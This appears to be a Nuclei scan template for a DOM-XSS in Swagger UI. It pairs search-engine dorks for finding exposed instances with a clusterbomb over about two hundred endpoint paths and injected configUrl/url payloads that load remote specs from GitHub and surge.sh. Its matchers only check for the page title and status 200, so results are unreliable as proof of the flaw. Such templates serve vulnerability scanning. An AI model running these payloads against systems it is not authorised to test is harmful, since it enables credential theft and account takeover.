id: swagger-ui-xss

info:
  name: Swagger UI DOM-XSS
  author: rix4uni
  severity: medium
  description: Swagger UI DOM-XSS >=3.14.1 < 3.38.0
  reference:
    - https://medium.com/@M0X0101/how-i-was-able-to-steal-users-credentials-via-swagger-ui-dom-xss-e84255eb8c96
    - https://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers
  metadata:
    google-query:
      - intext:"Swagger UI" intitle:"Swagger UI"
    shodan-query:
      - http.title:"Swagger UI"
    censys-query:
      - services.http.response.html_title="Swagger UI"
    fofa-query:
      - title="Swagger UI"
    hunter-query:
      - web.title="Swagger UI"
  tags: swagger

http:
  - method: GET
    path:
      - "{{BaseURL}}/{{ENDPOINT}}{{URI}}"

    attack: clusterbomb
    payloads:
      ENDPOINT:
        - "index.html"
        - "swagger/index.html"
        - "swagger-ui/index.html"
        - "swagger-ui.html"
        - "docs/index.html"
        - "v1/docs/index.html"
        - "webjars/swagger-ui/index.html"
        - "swagger/ui/index"
        - "restapi/swagger/ui/index"
        - "doc/swagger-ui/index.html"
        - "classicapi/doc/"
        - "browse/api-docs/index.html"
        - "swagger-ui-master/dist/"
        - "api-docs/"
        - "v1/api-docs/"
        - "cfpp/swagger-ui/index.html"
        - "sso/service/rest/swagger-ui.html"
        - "api/containers/v1/ui/"
        - "oms-substance-registry-services/swagger-ui/index.html"
        - "swagger-ui-NEW/index.html"
        - "api/swagger-ui/index.html"
        - "networking-ethernet-software/cumulus-linux-44/api/index.html"
        - "training-material/api/index.html"
        - "data/swagger-ui/index.html"
        - "dosdk/api/docs"
        - "ena/submit/drop-box/swagger-ui/index.html"
        - "csp/gateway/iam/vmwid/api/swagger-ui.html"
        - "api/tedapi/swagger-ui.html"
        - "swagger/ui/index.html"
        - "swagger/dist/index.html"
        - "apidocs/ui/index.html"
        - "documentation/swagger_ui/index.html"
        - "ibd-api/swagger-ui/index.html"
        - "rmm/swagger-ui/index.html"
        - "docs/swagger-ui.html"
        - "docs"
        - "clicktrack/"
        - "api_cass_tracking-docs/"
        - "api_ftp_alpha-docs/"
        - "api_ftp-docs/"
        - "api/documentation"
        - "doc/current/"
        - "api/services/rt/index.html"
        - "identity-api/"
        - "openapi/docs"
        - "api/ui/"
        - "api/doc/"
        - "Swagger/index.html"
        - "api/docs/index.html"
        - "v2/docs/index.html"
        - "api-docs/index.html"
        - "static/"
        - "static/index.html"
        - "single_swagger_doc"
        - "api-doc/"
        - "api/ui/index"
        - "site/docs"
        - "documentation/"
        - "openapi/swagger"
        - "swagger.php"
        - "MavHooksApi/swagger/ui/index"
        - "doc/index"
        - "api/v1/document/index.html"
        - "swagger-ui/dist/index.html"
        - "FluxusCore/swagger-ui/index.html"
        - "api/swagger/index.html"
        - "api/index.html"
        - "docs/static/index.html"
        - "v0/swagger-ui/"
        - "api/v1/docs/index.html"
        - "api/swagger.html"
        - "open-api/index.html"
        - "apidocs"
        - "docs/swagger/index.html"
        - "api/v1/doc/swagger-ui.html"
        - "doc/current/index.html"
        - "api/posvas-validation-service/docs/index.html"
        - "example/index.html"
        - "api/doc"
        - "openapi"
        - "api/docs/"
        - "api/static/index.html"
        - "doc"
        - "deca-ws/swagger-ui/index.html"
        - "swagger-ui/index.php"
        - "api/v1/doc/swagger-ui/index.html"
        - "api"
        - "api/"
        - "doc/index.html"
        - "api/swagger"
        - "explore/"
        - "/api/v1/"
        - "swagger/spec.html"
        - "doc/swagger-ui/"
        - "api/v1/docs/"
        - "-ws/swagger-ui/index.html"
        - "docs/webjars/swagger-ui/index.html"
        - "api/_info/swagger.html"
        - "apis/v1/docs"
        - "docs/v1"
        - "api-explorer/public/"
        - "hyperscale-compliance"
        - "api-docs"
        - "hip/swagger-ui/"
        - "help/v1/index"
        - "doc/"
        - "developer/"
        - "e-extension-ws/"
        - "api-tools/swagger/FiteryAPI-v1"
        - "ai4trust/docs"
        - "document"
        - "api/v1/documentation/"
        - "api/documentation/index.html"
        - "OAM/swagger-ui.html"
        - "govpay/"
        - "member/docs/index"
        - "apidocs/dist/"
        - "api/api-docs/index.html"
        - "docs/swagger-ui/index.html"
        - "v1"
        - "v1/doc/"
        - "api/v1/docs"
        - "api/v1/"
        - "api/v1/swagger"
        - "swagger/ui/"
        - "services2/help/"
        - "Swagger/ui/index"
        - "api/docs/swagger-ui/index.html"
        - "help/index.html"
        - "v2/"
        - "ca/v1/docs/"
        - "rest/v2/swagger-ui/"
        - "object-detection/docs"
        - "reference/index.html"
        - "__docs__/"
        - "api/v2/"
        - "api/v1/sap/docs"
        - "api/v1/banking/swagger-ui.html"
        - "docs/v1/"
        - "API/swagger-ui/index.html"
        - "help/index"
        - "swagger/index/api.html"
        - "apis/swagger-ui.html"
        - "v1/documentation"
        - "apis/duapi/havvarsel/v2/swagger-ui.html"
        - "v1/docs/"
        - "documentation/static/index.html"
        - "swagger/kci/index.html"
        - "swagger-ui"
        - "databroker/ui/"
        - "swagger/notifications/index.html"
        - "latest/docs"
        - "logsis-api/"
        - "api/doc/index.html"
        - "api/v1/index.html"
        - "assets/lib/swagger-ui/index.html"
        - "swagger/actors/index.html"
        - "sample/"
        - "api/v1/doc/"
        - "api/swagger/mdt/index.html"
        - "MLFLongSocketServer/swagger-ui.html"
        - "swagger/externals/index.html"
        - "ApiDoc/index.html"
        - "maincase-swagger"
        - "api/ui/index.html"
        - "api/document-service/docs/index.html"
        - "2.0/index.html"
        - "swagger/ui/index#/"
        - "thumbnail/docs"
        - "swagger/index.html/"
        - "documentation/index.html"
        - "openapi/index.html"
        - "iam/docs"
        - "0.1/ui/index.html"
        - "public/docs"
        - "swagger-ui/4.17.1/index.html"
        - "swagger-ui/"
        - "documentation"
        - "swagger/static/index.html"
        - "webjars/swagger-ui/3.24.0/index.html"
        - "v3/docs"
        - "v1/spec/"
        - "api/docs"
        - "healthmanager/swagger-ui.html"
        - "docs.html"
        - "routes"
        - "ui/index.html"
        - "doc/api-v1"
        - "swagger/swagger-ui/index.html"
        - "info/index.html"
        - "api-documentation/"
        - "api-docs/swagger-ui/index.html"
        - "swag/"
        - "swagger-ui/index.html?url=/api-docs&validatorUrl="
        - "api-spec/viewer/"
        - "shipment/swagger-ui.html"
        - "2023swagger0814/index.html"
        - "swagger.html"
        - "sslapi/swagger-ui/index.html"
        - "v1.4/swagger-ui.html"
        - "doc/v1/index.html"
        - "docs/"
        - "api/v1"
        - "v1/ui/index.html"
        - "api/docs/swagger.json"
        - "public/swagger-ui/index.html"
        - "swagger/index"
        - "documentacion"
        - "docs/api/"
        - "specifications/index.html"
        - "api/docs/v1/"
        - "v1.0/swagger-ui/index.html"

      URI:
        #json
        - "?configUrl=https://raw.githubusercontent.com/rix4uni/swagger-xss/main/swagger.json"
        
        #yaml
        - "?url=https://raw.githubusercontent.com/rix4uni/swagger-xss/main/swagger.yaml"

        #base64
        - "?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ=="

    threads: 100

    # stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Swagger UI"

      - type: status
        status:
          - 200